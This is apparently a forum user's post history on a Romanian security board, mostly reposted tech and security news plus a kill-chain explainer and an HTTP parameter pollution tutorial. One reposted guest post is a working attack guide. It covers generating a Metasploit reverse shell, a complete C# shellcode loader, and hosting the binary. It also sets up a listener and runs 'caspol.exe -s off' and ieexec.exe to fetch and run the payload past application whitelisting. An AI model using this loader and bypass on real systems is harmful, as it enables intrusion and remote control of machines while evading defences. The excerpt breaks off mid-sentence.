-
Posts
3206 -
Joined
-
Days Won
87
Everything posted by Fi8sVrs
-
Rile.js is a small HTML5 EPUB file reader. This project is still an early alpha, so most of the EPUB files will probably not display correctly or work at all. This project begun partially as a research project and partially as a tool for my fiancée’s writing blog. The name “Rile.js” comes directly from her first short story TODO Write tests Better page slicing - the slicing methods are not yet ready, they still need some love. Asynchronous pages slicing - because nobody likes when the UI freezes on large documents. Remembering the current page between page reloads. Download: https://github.com/sebastianrosik/rile.js.git Sources: https://github.com/sebastianrosik/rile.js XA//VX - Just some stuff about front-end development
-
Guest post by @infosecsmith2 There was a recent presentation at DerbyCon, entitled: by Christopher Campbell & Matthew GraeberI highly recommend that you start with this presentation as it lays the foundation for this post. The premise is, how can we maintain persistence in a corporate environment, using tools and defaults provided by the host OS we have compromised. This is a very important concept, given the shift in many organizations to an Application Whitelisting Defense model. It is only a matter of time before time before you might encounter an Application Whitelisting Defense. As a follow up to that presentation, I began exploring the binaries that ship by default with Windows. That is where I stumbled across a binary in the C:\Windows\Microsoft.NET\Framework64\v2.0.50727 path. The Executable is ieexec.exe. A write up is here: How to debug managed-client applications that are started by using a URL in Visual Studio .NET or in Visual Studio 2005 Excellent! So, now we just need to host our malicious binary , and call it from ieexec.exe. This is great, since most Application Whitelisting Environments are going to “Trust” anything signed my Microsoft as a matter of convenience. IEexec.exe will download and execute our code for us, all under the trusted process. So lets get started! Step 1. Prepare your Shellcode, or whatever malicious app you want. I compiled my executable using SharpDevelop, since it has less footprint than a full blown Visual Studio install. From msfconsole: msf > use windows/x64/shell/reverse_tcp msf payload(reverse_tcp) > set LHOST x.x.x.x msf payload(reverse_tcp) > set LPORT 443 msf payload(reverse_tcp) > generate -t csharp ? byte[] buf = new byte[422] { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52... <Snipped Full ShellCode for Brevity> Step 2. Create the .NET wrapper application using System; using System.Runtime.InteropServices; namespace native { class Program { private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; private static UInt32 MEM_RELEASE = 0x8000; public static void Main(string[] args) { // native function's compiled code byte[] proc = new byte[] { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52... //Edited ShellCode For Brevity }; UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data PROCESSOR_INFO info = new PROCESSOR_INFO(); IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO))); Marshal.StructureToPtr(info, pinfo, false); // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); // retrive data info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO)); Marshal.FreeHGlobal(pinfo); CloseHandle(hThread); VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE); } [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); [DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName ); [DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName ); [DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName ); [DllImport("kernel32")] private static extern UInt32 GetLastError(); [StructLayout(LayoutKind.Sequential)] internal struct PROCESSOR_INFO { public UInt32 dwMax; public UInt32 id0; public UInt32 id1; public UInt32 id2; public UInt32 dwStandard; public UInt32 dwFeature; // if AMD public UInt32 dwExt; } } } You will want to compile the exe for the target platform. In this case I am going for an x64 target. Also, you will want to compile for 2.0 or 3.5 Framework. Step 3. Host the Exe. For this example, I used Mongoose. Simple and Effective: mongoose - Mongoose - easy to use web server - Google Project Hosting By default Mongoose listens on port 8080. This is configurable. Simple place your compiled binary from step 2 into the same directory as Mongoose. Start Mongoose and you are almost ready to deliver your payload. Step 4. Setup your receiver: msf payload(reverse_tcp) > use exploit/multi/handler msf exploit(handler) > set LHOST x.x.x.x msf exploit(handler) > set LPORT 443 msf exploit(handler) > set PAYLOAD windows/x64/shell/reverse_tcp msf exploit(handler) > exploit -j Step 5. From the host that is protected via Whitelisting. Open 2 Command Prompts as administrator. CMD 1 Execute: :\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s off CMD 2 Execute: C:\Windows\Microsoft.NET\Framework64\v2.0.50727>ieexec.exe http://x.x.x.x:8080/bypass.exe There is some detail to unpack here, I can go over later, as to why we need to run caspol.exe. Here’s the behavior I saw in our experimentation with this. Initial attempt to run our rogue binary fails, since it is unknown/untrusted/unapproved: Now, on the same host… Executes just fine! Its important to distinguish what this technique is and what it is not. This is not an exploit or vulnerability. Rather this is one way to execute arbitraty code in an Application Whitelisting Environment. Summary: In this document we learned that even if a host is in a mode where only trusted approved applications can run. IEexec.exe can be used in certain situations to circumvent a Whitelist, since it is likely a trusted binary, since it is signed by Microsoft. Cheers, => @infosecsmith2 Source
-
- 1
-
In its latest breach of a highly trafficked website, the Syrian Electronic Army has published a database that it says contains login credentials for 1 million users of business publication Forbes.com.Forbes confirmed the attack Friday, but stopped short of saying how many credentials had been compromised. "Users' email addresses may have been exposed," Forbes wrote. "The passwords were encrypted, but as a precaution, we strongly encourage Forbes readers and contributors to change their passwords on our system, and encourage them to change them on other websites if they use the same password elsewhere." It's unclear how the SEA gained access to the data, though on Twitter the hackers blamed a Forbes social media manager. Forbes said it had notified law enforcement about the breach. The attackers also gained access to Forbes' publishing system, altering at least three stories on the publication's website, according to Re/code. Attackers also posted "Hacked by the Syrian Electronic Army" on the site. The Forbes blog was still down Saturday afternoon, though the rest of the site appeared to be functioning normally. Via Syrian Electronic Army hacks Forbes' website and posts user logins | The Verge
-
Scala.js compiles Scala code to JavaScript, allowing you to write your Web application entirely in Scala! Noteworthy features are: Support all of Scala (including macros!), modulo a few semantic differences Very good interoperability with JavaScript code. For example, use jQuery and HTML5 from your Scala.js code, either in a typed or untyped way. Or create Scala.js objects and call their methods from JavaScript. Integrated with sbt (including support for dependency management and incremental compilation) Can be used with your favorite IDE for Scala Generates Source Maps for a smooth debugging experience (step through your Scala code from within your browser supporting source maps) Integrates Google Closure Compiler for producing minimal code for production. Download Sources: https://github.com/scala-js/scala-js Scala.js
-
se numeste sms gateway
-
RTF (Rich Text Format) files have been used before by cybercriminals, but of late it seems their use of this format is becoming more creative. We’d earlier talked about how CPL files were being embedded in RTF files and sent to would-be victims as an e-mail attachment. These CPL files would then proceed to download malicious files which would be run on the affected samples. Earlier samples used instructions in Portuguese, but newer samples now use German: Figure 1. German-language RTF document Overall, the tactics are still the same – the RTF file contains an embedded “receipt” with instructions to double-click the receipt. Double-clicking this file runs the CPL malware, which downloads the payload. Figure 2. Code of RTF document In this particular case, the URL is no longer accessible so we cannot be 100% sure what the payload was. However, previous incidents have used information stealers, so in all likelihood that would have been the case here as well. We detect this variant of CPL malware as TROJ_CHEPRTF.SM2. A separate case also embedded malware into a RTF file, but this time the embedded malware belonged to the ZBOT malware family. This ZBOT variant is detected as TSPY_ZBOT.KVV; this variant has the capability to steal user names and passwords such as from various sources such as email, FTP and online banking. These incidents highlight how cybercrime techniques are always improving. RTF files may have been used in these cases because users may not know that RTF files can be used to spread malware, and even if they do know they may not be able to easily determine which files are malicious and which are not. In addition, using RTF files to spread ZBOT is unusual, as it’s typically spread via other means such as downloaders, malicious sites, or spam. This shows how cybercriminals are willing to embrace new tactics to achieve their goals. We encourage users to be careful when opening email messages and attachments. Never download and open attachments unless they can be verified. Businesses should employ a mail scanning solution implemented on the network and enable the scanning of email messages. The Trend Micro™ Smart Protection Network™ protects users from this threat by blocking access to all related malicious URLs, and preventing the download and execution of the malicious file. Source More Malware Embedded in RTFs | Security Intelligence Blog | Trend Micro
-
An Internet Explorer zero-day vulnerability (CVE-2014-0322) is actively exploited in the wild in a watering-hole attack targeting visitors to the official website of the U.S. Veterans of Foreign Wars, FireEye researchers warned on Thursday. "It’s a brand new zero-day that targets IE 10 users visiting the compromised website – a classic drive-by download attack. Upon successful exploitation, this zero-day attack will download a XOR encoded payload from a remote server, decode and execute it," they explained. "We believe the attack is a strategic Web compromise targeting American military personnel amid a paralyzing snowstorm at the U.S. Capitol in the days leading up to the Presidents Day holiday weekend. Based on infrastructure overlaps and tradecraft similarities, we believe the actors behind this campaign are associated with two previously identified campaigns (Operation DeputyDog and Operation Ephemeral Hydra)," they added in an later blog post. This new campaign has been dubbed "Operation SnowMan," and the similarities with the aforementioned earlier campaigns are many: exploitation of an IE zero-day, delivery of remote access Trojan (Gh0st RAT), "watering hole" exploit delivery method, related C&C infrastructure, the use of a simple single-byte XOR encoded (0×95) payload obfuscated with a .jpg extension. "The exploit targets IE 10 with Adobe Flash. It aborts exploitation if the user is browsing with a different version of IE or has installed Microsoft’s Experience Mitigation Toolkit (EMET)," they shared, and pointed out that installing EMET or updating to IE 11 are perfect mitigation measures. It is believed that the same actors have likely orchestrated all these campaigns. So far, the targets were US government agencies, defense companies, IT and law firms, NGOs, mining companies, so it's safe to say they were cyber espionage campaigns geared at stealing confidential information. Websense researchers say they have discovered the use of this same vulnerability as early as January 20, 2014 (FireEye detected the exploit on February 11), and that the targets were the visitors to a fake site mimicking that of the French aerospace association GIFAS, which includes contractors and firms in both the military and civilian aircraft industry. Again, the similarities between Operation SnowMan and this campaign aimed at GIFAS members are many, giving rise to the belief that the actors behind them are the same ones. Via IE 0-day used in watering hole attack tied to previous campaigns
-
- 1
-
Ball Aerospace, the folks who currently supply you with the hardware behind your Google Maps and Google Earth images, are about to launch their most powerful telescope yet. The third in the company's Worldview telescope series, it will be powerful enough to see objects on the ground as small as 10 inches across. Of course, you'll never see those images, because you don't have clearance. What the public will be able to see is a resolution that can depict objects 20 inches across, half the quality of those customers within the government will have access to. That's a comforting thought, and one which will no doubt lend credence to a number of conspiracy theories out there, but at least the Worldview-3 won't be fixing its lens on you all the time. It'll be too busy hurtling through space at roughly 18,000 miles per hour — fast enough to cover the entire globe every couple of days. Unlike other massive telescopes already in the heavens, the Worldview-3 won't be snapping individual images, but rather recording continuous ribbon-like images that might resemble the Earth as an unraveled ball of twine, if viewed in their raw form. Even at a height of 370 miles, the new telescope will be able to fix its lens on certain object for at least a little while as it zips by. Worldview-3 also be capable of seeing things that the human eye simply cannot, like the infrared spectrum. Ball Aerospace states that this will allow the Worldview-3 to identify man-made or natural materials. So much for that secret bunker you were planning on surviving the apocalypse in. Ball Aerospace program manager Jeff Dierks has no such reservations, however. Every time the satellites he helped build fly by, he steps into his yard to wave hello. Worldview-3 is slated to launch later this year. Via Powerful new Earth-facing satellite can see what you're eating | DVICE
-
Author: Thomas Wilhelm Table of content Cover image Title page Copyright page Preface About the Author About the Technical Editor Acknowledgments Chapter 1: Introduction Abstract Introduction Summary Chapter 2: Ethics and Hacking Abstract Getting Permission To Hack Code Of Ethics Canons [(ISC)2] Why Stay Ethical? Ethical Standards Computer Crime Laws Getting Permission To Hack Summary Chapter 3: Setting up Your Lab Abstract Introduction Summary Chapter 4: Methodologies and Frameworks Abstract Introduction Summary Chapter 5: Pentest Project Management Abstract Introduction Summary Chapter 6: Information Gathering Abstract Introduction Summary Chapter 7: Vulnerability Identification Abstract Introduction Summary Chapter 8: Vulnerability Exploitation Abstract Introduction Summary Chapter 9: Local System Attacks Abstract Introduction Summary Chapter 10: Privilege Escalation Abstract Introduction Summary Chapter 11: Targeting Support Systems Abstract Introduction Summary Chapter 12: Targeting the Network Abstract Introduction Summary Chapter 13: Web Application Attack Techniques Abstract Introduction Summary Chapter 14: Reporting Results Abstract Introduction Summary Chapter 15: Hacking as a Career Abstract Introduction Summary Download: http://uppit.com/79kegijxprzq/Professional_Penetration_Testing_-_Wilhelm,_Thomas.pdf
-
- 1
-
Project to develop 'next generation' of the Internet is part of Google's broader obsession with speed, CFO says SAN FRANCISCO – Google is working on technology that will provide data transfer speeds over the Internet that are many times faster than its current Google Fiber service in Kansas City, an executive at the online search giant said on Wednesday. Google Fiber offers data transfer speeds of 1 gigabit per second currently. But the company is already working on speeds of 10 gigabits per second, Chief Financial Officer Patrick Pichette said during the Goldman Sachs Technology and Internet conference. Pichette called this the next generation of the Internet and said it was part of Google's broader, long-term obsession with speed. Faster speeds will increase the use of software as a service because users will be able to trust that critical applications that are data intensive will run smoothly over the Internet, he explained. "That's where the world is going. It's going to happen," Pichette said. It may happen over a decade, but "why wouldn't we make it available in three years? That's what we're working on. There's no need to wait," he added. Google is not the only one working on this. Last year, researchers in the U.K. announced that they achieved data transmission speeds of 10 gigabits per second using "li-fi" a wireless Internet connectivity technology that uses light. Pichette has experience in this area. From early 2001 until July 2008, he was an executive at Bell Canada, which offers a fast, fiber optic Internet service to homes in that country. Google Fiber is currently available in Kansas City, but Google has said it is bringing the service to Austin, Texas and Pichette told analysts last year that the project is not a hobby for the company. On Wednesday he was asked whether Google Fiber will be coming to more cities. "Stay tuned," Pichette answered. Via Google working on 10 gigabit Internet speeds
-
https://rstforums.com/forum/49031-linux-wallpaper.rst
-
What is BlackArch Linux? BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers. The toolset is distributed as an Arch Linux unofficial user repository so you can install BlackArchLinux on top of an existing Arch Linux installation. Packages may be installed individually or by category. We also have a live ISO. We currently have over 630 tools in our toolset and the repository is constantly expanding. Get Involved You can get in touch with the blackarch team. Just check out the following: Please, send us pull requests! Web: http://www.blackarch.org/ Mail: blackarchlinux@gmail.com IRC: irc://irc.freenode.net/blackarch Download and Installation BlackArch only takes a moment to setup. There are three ways to go: Install on an existing Arch machine. Use the live ISO. The live ISO comes with an installer (blackarch-install). You can use the installer to install BlackArch to your hard disk. http://www.youtube.com/watch?v=lteqJd0r25E Source
-
The Intrusion (Cyber) Kill Chain is a phrase popularized by infosec industry professionals and introduced in a Lockheed Martin Corporation paper titled; “ Intelligence Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains”. The intrusion kill chain model is derived from a military model describing the phases of an attack. The phases of the military model are: find, fix, track, target, engage, and assess. The analyses of these phases are used to pinpoint gaps in capability and prioritize the development of needed systems. The first phase in this military model is to decide on a target (find). Second, once the target is decided you set about to locate it (fix). Next, you would surveill to gather intelligence (track). Once you have enough information, you decide the best way to realize your objective (target) and then implement your strategy (engage). And finally, you analyze what went wrong and what went right (assess) so that adjustments can be made in future attacks. Lockheed Martin analysts began by mapping the phases of cyber attacks. The mapping focused on specific types of attacks, Advanced Persistent Threats (APTs) - The adversary/intruder gets into your network and stays for years– sending information, usually encrypted – to collection sites without being detected. Since the intruder spent so much time in the network, analysts were able to gather data about what was happening. Analysts could then sift through the data and begin grouping it into the military attack model phases. Analysts soon realized that while there were predictable phases in cyber attacks, the phases were slightly different from the military model. The intrusion (cyber) kill chain shown below, describe the phases of a cyber attack. The chain of events or activities are as follows: [table=width: 500, class: grid, align: center] [tr] [td]Link in the Chain[/td] [td]Description[/td] [/tr] [tr] [td]1. Reconnaissance[/td] [td] Research, identification and selection of targets- scraping websites for information on companies and their employees in order to select targets.[/td] [/tr] [tr] [td]2. Weaponization[/td] [td]Most often, a Trojan with an exploit embedded in documents, photos, etc.[/td] [/tr] [tr] [td]3. Delivery[/td] [td]Transmission of the weapon (document with an embedded exploit) to the targeted environment. According to Lockheed Martin's Computer Incident Response Team (LM-CIRT), the most prevalent delivery methods are email attachments,websites, and USB removable media.[/td] [/tr] [tr] [td]4. Exploitation[/td] [td] After the weapon is delivered, the intruder's code is triggered to exploit an operating system or application vulnerability, to make use of an operating system's auto execute feature or exploit the users themselves.[/td] [/tr] [tr] [td]5. Installation[/td] [td] Along with the exploit the weapon installs a remote access Trojan and/or a backdoor that allows the intruder to maintain presence in the environment[/td] [/tr] [tr] [td]6. Command and Control[/td] [td]Intruders establish a connection to an outside collection server from compromised systems and gain 'hands on the keyboard' control of the target's compromised network/systems/applications.[/td] [/tr] [tr] [td]7. Actions on Objective[/td] [td] After progressing through the previous 6 phases, the intruder takes action to achieve their objective. The most common objectives are: data extraction, disruption of the network, and/or use of the target's network as a hop point.[/td] [/tr] [/table] Lockheed Martin's analysts also discovered while mapping the intruder's activities, that a break (kill) in any one link in the chain would cause the intrusion to fail in its objective. This is one of the major benefits of the intrusion kill chain framework as security professionals have traditionally taken a defensive approach when it comes to incident response. This means that intrusions can be dealt with offensively too. Lockheed Martin's case studies reveal that knowledge about previous intrusions and how they were accomplished allow analysts to recognize those previously used tactics and exploits in current attacks. For example, mapping of three intrusions revealed that all three were delivered via email, all three used very similar encryption, all three used the same installation program and connected to the same outside collection site. All of the intrusions were stopped before they accomplished their objective. How did they do this? How can my company utilize this approach? Monitoring and mapping is the key. The following list contains some of the necessary components (not in any particular order) needed to do intrusion mapping and setting up the kill. · Network Intrusion Detection (NIDS) · Network Intrusion Prevention (NIPS) · Host Intrusion Detection (HIDS) · Firewall access control lists (ACL) · Full packet inspection · A mature IT asset management system · A mature and comprehensive Configuration Management Database (CMDB) · Device and system hardening · Secure configurations baselines · Website inspection · Honeypots · Anti-virus and anti-malware · Verbose logging – network devices, servers, databases, and applications · Log correlation · Alerting · Patching · Email and FTP inspection and filtering · Network tracing tools · Information Security staff trained in tracking and mapping events end-to-end · Coordination and partnering with IT, Application Owners, Database Administrators, Business Units and Management both in investigation and communicating the mapped intrusions. In short, in order to implement intrusion kill chain activity a company needs to have a mature inter-operating and information security program. Additionally, they need trained staff that can investigate, map and advise 'kill' activities, keep a compendium of mapped intrusions, analyze and compare old and new intruder activity, code use, and delivery methods to thwart current and future intrusions. The intrusion (cyber) kill chain is not an endeavor that can be successfully implemented in place of a comprehensive Information Security Program, it’s another tool to be used to protect the company's data assets. The good news is if your company doesn't have a mature information security program there is a lot you can do while making plans to introduce an intrusion kill chains in your department's arsenal. · Educate your employees to watch for suspicious emails. For instance, emails that seem to be off – such as, someone in accounting receiving an invitation to attend a marketing conference. Let them know that they shouldn't open attachments included in email like this. · Make sure you have anti-virus and anti-malware software installed and up to date. · Start an inventory of your computing devices, laptops, desktops, tablets, smartphones, network devices and security devices. · You have an advantage over intruders. You know your network and what is normal and usual, they don't. Notice user behavior that is not usual and look into it. For example, a login at 2am for someone who works 9 to 5. Or an application process that normally runs overnight that is kicking off during the day. · Keep your security patches up to date. · Create and monitor baseline configurations. · Write, publish and communicate information security policies and company standards. · Turn on logging and start collecting and keeping logs. Start with network devices and firewalls and then add servers and databases. Set up alerts for things such as repeated attempts at access. · Spend some time using search engines from outside your network to see how much information can be learned about your company from the Internet. You'd be surprised how much you can find including sensitive documents. All of these practices and activities give you more information about your computing environment and what is normal and usual. The more you know about your environment, the more likely it is that you will spot the intruder before any damage is done. Source
-
HTTP Parameter Pollution a.k.a. HPP is a kind of a attack where an malicious attacker overrides or add HTTP GET/POST parameters by injecting query string delimiters. As the name suggests HPP pollutes the HTTP parameter with the intention of performing a malicious attack. In other to achieve the malicious goal the attacker injects the encoded query string delimiters in existing or other HTTP parameters i.e. GET/POST/Cookie. All web technologies whether running client side or server side are prone to this attack. There are two types of HPP attacks, the first one is Client-side Parameter Pollution vulnerability (which I will be explaining today) and the other one is Server-side Parameter Pollution vulnerability which will be discussed some other day. Submission of one parameter more than once is allowed by the HTTP protocol, the way through which the value of parameter is manipulated depends on the web technology used. Some parse the first or the last occurrence of the parameter, some parse the whole input and some of them create array of all the parameter. The above picture show how the values of the same parameter are parsed on different web technologies at server side. Client-side Parameter Pollution In client-side parameter pollution, the user is affected which leads to the trigger of a malicious action without the knowledge of the affected user. I will be explaining you the vulnerability with an easy to understand example, so here we go. For example we will be considering a web application which allows users to caste their votes for their favorite candidate. The parameter used in the web application is votepoll_id which identifies the candidate for which the user is voting for. Based on the value of the parameter, application generates a page which include one link for each candidate. The following code illustrates a voting page with the link of two candidates, where the user can caste his/her vote by clicking on the desired link. URL : http://host/election.js?votepoll_id=0756 Link 1 : <a href ="vote.jsp?votepoll_id=0756&candidate=Alex">Vote for Alex</a> Link 2 : <a href ="vote.jsp?votepoll_id=0756&candidate=Max">Vote for Max</a> Suppose Sam, a supporter of Alex wants to vote for him, and thinks of subverting the results and realizes that the application is not properly sanitizing the value present in votepoll_id. So, therefore Sam exploits the HPP vulnerability to inject other parameter of his choice and sends it to Donna. URL : http://host/election.js?votepoll_id=0756%26candidate%3DAlex Here what Sam does is, he pollutes the votepoll_id parameter to inject another parameter of his choice which in our case is candidate=Alex pair. By clicking on this link, Donna is redirected to the original website where she can caste her vote for the election. When Donna visits the page, malicious candidate value is injected in the URL. URL : http://host/election.js?votepoll_id=0756%26candidate%3DAlex Link 1 : <a href ="vote.jsp?votepoll_id=0756&candidate=Alex&candidate=Alex">Vote for Alex</a> Link 2 : <a href ="vote.jsp?votepoll_id=0756&candidate=Alex&candidate=Max>Vote for Max</a> No matter which of the above link Donna clicks on, the application will receive two same parameters but which different values, the value of the parameter present first will be ONLY taken into consideration, and the value of second parameter will be IGNORED. So from the above example, we an conclude that due to improper sanitization of the values, this vulnerability occurs. The developer expected to receive only one value i.e. only one candidate name so he provided basic java functionality which sadly resulted in HTTP Parameter Pollution attack. Solutions for HPP attacks -> URL encoding should be performed -> Strict regular expression must be used -> Should be aware of multiple occurrence of a parameter Source
-
Qualys BrowserCheck Qualys BrowserCheck is a free tool that scans your browser and its plugins to find potential vulnerabilities and security holes and help you fix them. https://browsercheck.qualys.com/ ======================================================= Browser Scope Browserscope is a community-driven project for profiling web browsers. The goals are to foster innovation by tracking browser functionality and to be a resource for web developers. Security - Tests ======================================================= Panopticlick Panopticlick checks if your browser’s configuration is unique. The more unique your browser, the less easily it could be tracked. Web tracking is a privacy risk for users. http://panopticlick.eff.org/
- 1 reply
-
- 1
-
Dedicated to “All the seekers of knowledge and the truth” Al-Sakib Khan Pathan Contents Preface...............................................................................................................................................ixAcknowledgments .............................................................................................................................xiEditor .............................................................................................................................................xiiiContributors .....................................................................................................................................xv PART I Network Traf?c Analysis and Management for IDS Chapter 1 Outlier Detection ..........................................................................................................3 Mohiuddin Ahmed, Abdun Naser Mahmood, and Jiankun Hu Chapter 2 Network Traf?c Monitoring and Analysis .................................................................23 Jeferson Wilian de Godoy Stênico and Lee Luan Ling Chapter 3 Using Routers and Honeypots in Combination for Collecting Internet Worm Attacks ........................................................................................................................47 Mohssen Mohammed and Al-Sakib Khan Pathan Chapter 4 Attack Severity–Based Honeynet Management Framework......................................85 Asit More and Shashikala Tapaswi PART II IDS Issues for Different Infrastructures Chapter 5 Intrusion Detection Systems for Critical Infrastructure ..........................................115 Bernardi Pranggono, Kieran McLaughlin, Yi Yang, and Sakir Sezer Chapter 6 Cyber Security of Smart Grid Infrastructure ...........................................................139 Adnan Anwar and Abdun Naser Mahmood Chapter 7 Intrusion Detection and Prevention in Cyber Physical Systems ..............................155 Mohamed Azab and Mohamed Eltoweissy Chapter 8 Encrypted Ranked Proximity and Phrase Searching in the Cloud ..........................187 Steven Zittrower and Cliff C. Zou viii Contents Chapter 9 Intrusion Detection for SCADA Systems .................................................................211 Alaa Atassi, Imad H. Elhajj, Ali Chehab, and Ayman Kayssi Chapter 10 Hardware Techniques for High-Performance Network Intrusion Detection ...........233 Weirong Jiang and Viktor K. Prasanna PART III Arti?cial Intelligence Techniques for IDS Chapter 11 New Unknown Attack Detection with the Neural Network–Based IDS .................259 Przemys?aw Kukie?ka and Zbigniew Kotulski Chapter 12 Arti?cial Intelligence-Based Intrusion Detection Techniques .................................285 Zahra Jadidi, Vallipuram Muthukkumarasamy, and Elankayer Sithirasenan Chapter 13 Applications of Machine Learning in Intrusion Detection ......................................311 Yuxin Meng, Yang Xiang, and Lam-For Kwok PART IV IDS for Wireless Systems Chapter 14 Introduction to Wireless Intrusion Detection Systems .............................................335 Jonny Milliken Chapter 15 Cross Layer–Based Intrusion Detection Techniques in Wireless Networks: A Survey ...................................................................................................................361 Subir Halder and Amrita Ghosal Chapter 16 Intrusion Detection System Architecture for Wireless Sensor Network..................391 Mohammad Saiful Islam Mamun Chapter 17 Unique Challenges in WiFi Intrusion Detection ......................................................407 Jonny Milliken Chapter 18 Intrusion Detection Systems for (Wireless) Automation Systems ...........................431 Jana Krimmling and Peter Langendoerfer Chapter 19 An Innovative Approach of Blending Security Features in Energy-Ef?cient Routing for a Crowded Network of Wireless Sensors ..............................................449 Al-Sakib Khan Pathan and Tarem Ahmed The State of the Art in Intrusion Prevention and Detection
-
To ensure enemies can’t capture tech, DARPA wants chip that turns to dust. The Defense Advanced Research Projects Agency has awarded a contract to IBM to create a CMOS chip that will self-destruct on command, turning into silicon dust. The goal of the project, called Vanishing Programmable Resources (VAPR), is to develop technologies that would prevent classified military systems from falling into unfriendly hands. “It is nearly impossible to track and recover every [electronic] device [on the battlefield], resulting in unintended accumulation in the environment and potential unauthorized use and compromise of intellectual property and technological advantage,” DARPA states on the webpage for the VAPR program. VAPR is a “broad agency announcement” program that was announced last month in order to fund multiple development efforts to create “electronic systems capable of physically disappearing in a controlled, triggerable manner…[with] performance comparable to commercial-off-the-shelf electronics, but with limited device persistence that can be programmed, adjusted in real-time, triggered, and/or be sensitive to the deployment environment.” The technology being developed by IBM under a $3.45 million award will use a glass substrate that shatters when an attached “fuse or reactive metal layer” receives an external radio frequency signal. That sort of command self-destruct would make it possible to destroy electronics lost or abandoned on the battlefield over a large area, and it would prevent scenarios like the transfer of technology found in the helicopter abandoned during the SEAL Team strike on Osama Bin Laden’s compound in Pakistan. Via DARPA funds IBM development of chip that will self-destruct | Ars Technica
-
Ex-Sony president recalls an unforgettable golf course meeting In 2005, Steve Jobs' announcement that Apple's computers would be moving from PowerPC to Intel surprised many. OS X had been living "a secret double life" with Intel for five years, said Jobs, but according to a new report from Japan, that life almost included an even more shocking partner — Sony. Japanese freelance writer Nobuyuki Hayashi, who has covered Apple for over two decades, quotes ex-Sony president Kunitake Ando recalling a 2001 meeting between him and Jobs in Hawaii. After playing a round of golf with other Sony executives, says Ando, "Steve Jobs and another Apple executive were waiting for us at the end of the golf course holding VAIO running Mac OS." Jobs had shut down the Mac "clone" business years earlier but, according to Ando, admired Sony's VAIO line so much he was "willing to make an exception." The timing, however, was bad. Sales of the company's Windows-powered laptops had just begun taking off, and the negotiations to make Mac-compatible VAIO's ultimately came to nothing. As far-fetched as the story sounds, Jobs had a well-documented respect for Sony, and a good relationship with its executive team. Ando's account of the 2001 meeting corroborates a well-reported anecdote about the secrecy of the Intel team at Apple, which claimed that Apple's ex-SVP of software engineering Bertrand Serlet made the team "go to Fry's and buy the top of the line, most expensive VAIO they have" to demonstrate the possibility of OS X on Sony hardware. Yesterday, rumors swirled that Sony is planning on selling its VAIO division to a Japanese investment firm. The company acknowledged the rumors, but did not deny them directly. Via Steve Jobs wanted Sony VAIOs to run OS X | The Verge
-
The British spy agency GCHQ used hacking techniques, including distributed denial of service (DDoS) attacks, against the hacking collective Anonymous, according to new documents leaked by Edward Snowden. Anonymous hackers were attacking websites with their own DDoS attacks in 2011 while authorities in the UK and the U.S. were scrambling for a response — it turns out GCHQ's answer was to turn the hackers' weapons against them. The new documents reveal that a GCHQ unit dubbed the Joint Threat Research Intelligence Group, or JTRIG, launched an operation called Rolling Thunder against the hacker collective in 2011. That operation included using DDoS attacks as well as malware to slow down the hackers and later identify them, as first reported by as reported by NBC News on Wednesday. As part of the operation, GCHQ agents infiltrated the chat rooms where hackers were gathering, and flooded the servers hosting those chat rooms with excessive traffic — a DDoS attack — to prevent them from logging on. This is the first time the GCHQ, which is the British equivalent of the NSA, has been directly accused of using hacking techniques in its operations to fight crime, and it's the first time a government agency has been accused of a DDoS attack specifically. But it is not uncommon for other law enforcement agencies to use hacking techniques. The FBI uses malware to hack into and spy on suspects' computers. It has also using phishing to install custom-made malware to track down a suspected bomber. For critics, the latest revelations highlight a double standard: It's a crime when Anonymous shuts down websites using DDoS attacks, but not when GCHQ does it. It's also an overreaction that may stifle the freedom of expression rights of innocent netizens, argues Gabriella Coleman, an anthropology professor at McGill University who has extensively studied and written about Anonymous, who explained that only a few Anonymous hackers were actually engaged in illegal activities. "The real concern here is a shotgun approach to justice that sprays its punishment over thousands of people who are engaged in their democratic right to protest simply because a small handful of people committed digital vandalism," she wrote in an op-ed on Wired. "This is the kind of overreaction that usually occurs when a government is trying to squash dissent; it’s not unlike what happens in other, more oppressive countries." Jake Davis, a.k.a. Topiary, one of the hackers mentioned in the leaked documents, reacted to the revelations by accusing the GCHQ of breaking the law. Davis was arrested in 2012, and later pleaded guilty for participating in two DDoS attacks. He later doubled-down in an op-ed titled "Who are the real criminals?" published on The International Business Times on Wednesday. "There's no justification for how nonchalant a democratic government can be when they breach the very computer misuse rules they strongly pushed to set in place," he wrote. The British spy agency, however, defended itself and the legality of its actions. "All of GCHQ's work is carried out in accordance with a strict legal and policy framework," a spokesperson said in a statement to NBC News, "which ensure that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the Secretary of State, the Interception and Intelligence Services Commissioners and the Parliamentary 